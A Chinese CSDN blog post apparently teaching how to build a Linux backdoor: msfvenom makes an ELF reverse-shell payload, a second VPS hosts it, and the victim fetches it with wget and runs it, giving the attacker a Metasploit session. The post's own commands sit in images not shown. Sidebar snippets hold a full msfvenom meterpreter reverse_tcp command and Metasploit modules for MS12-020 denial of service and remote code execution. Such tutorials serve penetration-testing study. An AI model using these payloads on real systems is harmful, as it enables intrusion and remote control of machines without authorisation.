MSF --Linux后门之elf文件

最新推荐文章于 2024-01-25 11:19:57 发布
最新推荐文章于 2024-01-25 11:19:57 发布
阅读量4.1k 收藏 2
点赞数 1
分类专栏: # MetaSploit 文章标签: msf linux后门 linux远程控制 msf后门生成
学习之路长且漫,长情与君总会见!
本文链接:https://blog.csdn.net/Aaron_Miller/article/details/106895557
版权

文章目录

一、环境

这里我在VPS上模拟真实的攻击环境:

  • 受害者:192.168.159.129(内网、CentOS7)
  • 攻击者:(公网VPS1、MSF)
  • 攻击者:(公网VPS2、HTTP服务)

Tips:也可以使用一台VPS,这里为了将HTTP服务和MSF攻击环境分开,这里我使用两台VPS主机

二、操作

VPS1的msfvenom生成elf文件的payload
在这里插入图片描述
将payload(reverse_msf_shell)上传至另一台VPS2的站点目录下(方便后续在受害者主机上下载)
在这里插入图片描述
攻击者开启msf监听
在这里插入图片描述
在这里插入图片描述
受害者主机上通过wget远程下载VPS2中的payload到本地
在这里插入图片描述
赋予elf文件可执行权限
在这里插入图片描述
执行payload
在这里插入图片描述
等待一段时间msf中便会上线
在这里插入图片描述

風月长情
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
rtk_sensor_damagezfw_rtk_ROS_gpsrtkros_msf-ekf_
09-30
ros RTK驱动,可用于ROS开发,需要建立ROS工作空间
kali linux-msf-ssh爆破
10-13
使用 nmap(-A -T4参数) metasploit (直接search 查找,然后 use利用就好了)本模块将测试SSH登录,在一系列的机器和报告成功登录。如果你有一个数据库加载插件和连接到一个数据库,该模块会记录成功登录和HOSTS使您可以跟踪您的访问。
php-msf源码详解
10-18
主要介绍了php-msf源码的意思以及用法相关问题,有需要的朋友跟着参考学习下吧。
php-msf-docs:PHP微服务框架开发手册,即Micro Service Framework For PHP Develop Manual
04-29
PHP-MSF开发手册 PHP微服务框架开发手册,即Micro Service Framework For PHP Develop Manual,PHP微服务框架即,是Camera360社区服务器端团队基于Swoole自主研发的现代化PHP服务框架,简称msf或者php-msf,它的核心设计思想是采用协程、异步、并行的创新技术手段提高系统的单机吞吐能力,降低整体服务器成本。 本手册从介绍异步、并行、协程等基础概念出发,再到框架如何使用,其中也介绍了部分内部实现的原理,简单易上手。通过学习本手册,再结合我们的demo示例项目,就能够使用构建大规模高性能的微服务化分布式系统。 _______ ____ ________ / /_ ____ ____ ___ _____/ __/ ___/ __ \/ _
php-msf-demo
04-29
PHP-MSF DEMO PHP微服务框架即“”示例项目 How to Start # Step1. 下载项目 git clone https://github.com/pinguo/php-msf-demo.git # Step2. 安装docker镜像构建开发环境.进入项目目录 sh build.sh # Step3. 参考Step2输出的信息,使用ssh或者exec进入容器, 到达项目根目录, 安装依赖 composer install # Step4. 启动服务器, 可以使用supervisorctl执行update或者执行php server.php 即可。 php server.php Notice php-msf-demo示例项目使用的是最新的代码,即dev-master分支,生产环境请使用release的相关版本。 在有些环境中执行php server.php,由于inot
Msfvenom的使用
Beret-81的博客
03-12 950
目录1、初识 Msfvenom2、Msfvenom 使用3、Msfvenom 例子Msfvenom 生成 elf 文件4、Msfvenom 生成各种 Payload 1、初识 Msfvenom Msfvenom是Metasploit独立的有效载荷生成器,也可以替代msfpayload和msfencode。 2、Msfvenom 使用 语法: Msfvenom -p lhost= lpor...
msf生成linux elf木马反弹shell
shatianyzg的博客
06-13 1449
攻击机:Kali 192.168.241.128 靶机:centos 7 192.168.241.129 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf各参数解释: inux/x64/meterpreter/reverse_tcp //这是反弹的payload LHOST=xxx.xxx.xxx.xxx //这里写kali的ip LPORT //写k
服务器系统linux下载软件,服务器在Linux系统下安装系统软件包的方式
weixin_29816689的博客
04-28 302
原标题:服务器在Linux系统下安装系统软件包的方式服务器在Linux系统下,跟在Windows系统下安装系统软件包的方式是不同的。一般在 Windows下安装软件时,用户只需双击软件的安装程序,或者直接用解压缩软件解压缩即可安装。在Linux系统下,安装软件时难度比在 Windows系统下要大些。1、后缀为rpm的软件这是 Red Hat Linux提供的最常见软件的一种包封装格式,在许多 Li...
linux系统软件包下载
火苗999℃的博客
01-12 2710
Linux Packages Search https://pkgs.org/
Linux下的ELF文件、链接、加载与库(含大量图文解析及例程)
weixin_44966641的博客
10-06 8271
Linux下的ELF文件、链接、加载与库 链接是将将各种代码和数据片段收集并组合为一个单一文件的过程,这个文件可以被加载到内存并执行。链接可以执行与编译时,也就是在源代码被翻译成机器代码时;也可以执行于加载时,也就是被加载器加载到内存执行时;甚至执行于运行时,也就是由应用程序来执行。 ​ — CSAPP 本文主要参考[原创] Linux环境下:程序的链接, 装载和库,[完结] 2020 南京大学
Linux-ELF文件详解
05-21
很详细的一份针对于elf格式文件的技术文档,对于想更深层次的了解Linux的朋友们相信会有很大帮助的
Understanding ELF
08-18
Understanding ELF 介绍ELF格式
[2023最新]美少妇Metasploit(MSF)下载安装及使用详解,永久免费使用,环境配置和使用技巧指南_msf下载
最新发布
liuhyusb的博客
01-25 1070
主要的攻击代码全在这个目录下,这里边包括的 exp 的路径的命名规则是:系统/服务/模块,在使用的exp 是可以根据这个命名方法来找(也可以用 search 这条指令来找)。令牌(Token)就是系统的临时秘钥,相当于账户名和密码,用来决定是否允许这次请求和判断这次请求是属于那个用户的。auxiliary:主要包含渗透测试中一些辅助性脚本,这些脚本功能有扫描,嗅探,破解,注入,漏洞挖掘等。同时还需要管理员权限的进程才可以使用,很很显然我们现在的是普通用户的运行程序。
Metasploit(MSF)使用详解—以kali系统环境下永恒之蓝(ms17_010)为例
weoptions的博客
09-21 3052
Metasploit是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。
ELF文件格式
一缕阳光的博客
03-18 323
ELF文件格式 ELF文件(Executable Linkable Format)是一种文件存储格式。Linux下的目标文件和可执行文件都按照该格式进行存储,有必要做个总结。 概要 本文主要记录总结32位的Intel x86平台下的ELF文件结构。ELF文件以Section的形式进行存储。代码编译后的指令放在代码段(Code Section),全局变量和局部静态变量放到数据段(Dat...
msf生成elf文件进行一次简单的逆向分析
热门推荐
Shanfenglan's blog
11-25 6万+
CATALOG1.前言2.需要的工具3.开始调试参考文章 1.前言 从没接触过这个技术点,今天刚好有机会接触,所以写一篇文章做个记录。 2.需要的工具 gdb 使用apt-get install gdb即可下载。 peda 为了弥补gdb不显示寄存器的缺陷所以要使用这个工具,在gdb安装好后执行下面的命令: git clone https://github.com/longld/peda.git ~/peda echo "source ~/peda/peda.py" >> ~/.gdbini
Metasploit终端下的辅助扫描工具 (auxiliary模块讲解)
Kevin's Blog
06-01 5931
(辅助扫描工具主要用于网络攻防前期的踩点、信息搜集) 一、操作环境 虚拟机Kali(IP:192.168.1.92) # 为方便学习开启ssh端口 # 进入ssh配置文件 》》vi /etc/ssh/sshd_config 将#PasswordAuthentication no的注释去掉,并且将NO修改为YES (//kali中默认是yes) 将PermitRoot...
msf之ms12-020的复现
05-24
MS12-020是远程桌面协议(RDP)中的一个漏洞,它可以允许攻击者通过发送恶意的RDP数据包来执行远程代码。MSF(Metasploit框架)是一个开源的漏洞利用工具,可以用来测试和利用此漏洞。 以下是利用MS12-020漏洞的步骤: 1. 首先,需要使用Metasploit框架。如果你还没有安装它,请先到官网下载并安装。 2. 打开Metasploit框架控制台,输入以下命令: ``` use auxiliary/scanner/rdp/ms12_020_check ``` 这个命令将会检查目标是否存在MS12-020漏洞。 3. 如果目标存在漏洞,可以使用以下命令进行攻击: ``` use auxiliary/dos/windows/rdp/ms12_020_maxchannelids set RHOSTS <target IP address> exploit ``` 这个命令将会执行一个拒绝服务攻击,导致目标系统崩溃。这个攻击不会导致目标系统被入侵或数据被窃取,但是可以影响系统的可用性。 4. 如果你想要执行更危险的攻击,可以使用以下命令: ``` use exploit/windows/rdp/ms12_020_maxchannelids set RHOSTS <target IP address> set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <attacker IP address> exploit ``` 这个命令将会执行一个远程代码执行攻击,使用Meterpreter反向Shell连接到目标系统。这个攻击可以让攻击者完全控制目标系统,包括执行任意命令、窃取数据等。 需要注意的是,利用漏洞进行攻击是非法的,只能在授权的环境下进行测试。同时,这个漏洞已经被修复,建议尽快更新你的系统以避免被攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

風月长情

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值